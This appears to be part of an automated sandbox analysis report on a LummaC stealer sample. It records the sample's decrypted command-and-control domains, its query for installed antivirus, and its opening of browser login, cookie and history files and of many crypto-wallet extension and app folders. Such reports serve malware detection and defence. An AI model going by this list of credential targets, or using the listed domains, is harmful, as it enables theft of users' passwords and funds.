            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.000000000394B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: LisectAVT_2403002A_236.exeBinary or memory string: WtvuF+P406voTx9Wltl3E/5lGVHZO7Qh5ejQhhFihjaCUi6MEor4Vj/NhscRXP5vyZCubEizzJAyXtsIMrKDuopDcRMMFbv6vBv6z++TpP7ZBgP1ako6UXVMcir1+swte3aZvpyZd+T7mVpjZqlgwRH3Ayl5z1nbXp6eqzQwKdul+SvLGL+tLe/jPr5yXn5sujJvEz0PvGAL9aK/teXD3kJlu1LvwMFdtjHsCSYee9T7mpKGgbpYqSMjRK1UvNA3tykU
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1373080900.000000000393D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: associationokeo.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: turkeyunlikelyofw.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: pooreveningfuseor.pw
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: edurestunningcrackyow.fun
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: detectordiscusser.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: relevantvoicelesskw.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: colorfulequalugliess.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: wisemassiveharmonious.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: unhappytidydryypwto.shop
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1461606764.0000000001465000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1438996556.0000000001463000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1439136954.0000000001476000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_236.exe PID: 6236, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 4<d4<d4<Wallets/Electrum-LTC53<C:\Users\user\AppData\Roaming\Electrum-LTC\wallets3p2<%appdata%\Electrum-LTC\wallets<*
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 4<d4<d4<Wallets/ElectronCash53<C:\Users\user\AppData\Roaming\ElectronCash\wallets3p2<%appdata%\ElectronCash\wallets<*
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1461923804.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 1<window-state.json
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 4<d4<d4<Wallets/Exodus<C:\Users\user\AppData\Roaming\Exodus\exodus.wallet3p2<%appdata%\Exodus\exodus.wallet<keystoreC
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1462122491.00000000013C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: d4<app-store.json<Wallets/BinanceC:\Users\user\AppData\Roaming\Binancep2<%appdata%\Binance mC
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: d4<Wallets/Ethereum<_lC
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1461923804.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1462122491.00000000013C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 4<d4<d4<Wallets/Ledger Live53<C:\Users\user\AppData\Roaming\Ledger Live*p2<%appdata%\Ledger Live
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\Application Data\Mozilla\FirefoxJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
